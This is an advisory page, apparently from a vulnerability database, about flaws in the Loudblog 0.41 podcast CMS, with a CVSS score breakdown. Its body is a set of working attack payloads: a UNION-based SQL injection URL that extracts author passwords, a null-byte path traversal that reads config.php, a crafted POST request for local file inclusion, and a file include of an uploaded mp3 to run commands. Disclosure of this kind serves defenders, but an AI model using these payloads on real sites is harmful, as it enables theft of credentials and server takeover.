Loudblog 0.41 SQL Injection, Local file read/include

2006.03.08
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

"Loudblog is a sleek and easy-to-use Content Management System (CMS) for publishing media content on the web." SQL Injection in podcast.php (magic_quotes=off): http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select password,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null from lb_authors where '1'='1' /* Read local files (index.php): http://[target]/loudblog/index.php?template=../../../loudblog/custom/con fig.php%00 Local php file include (loudblog/inc/backend_settings.php): POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1 Host: [target] Content-Type: application/x-www-form-urlencoded Content-Length: 23 language=../../../index Local file include (upload a cmdphp.mp3 comment, include it, must have access to admin panel): http://[target]/loudblog/loudblog/index.php?page=/../../../audio/cmdphp. mp3%00 ~kuze


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top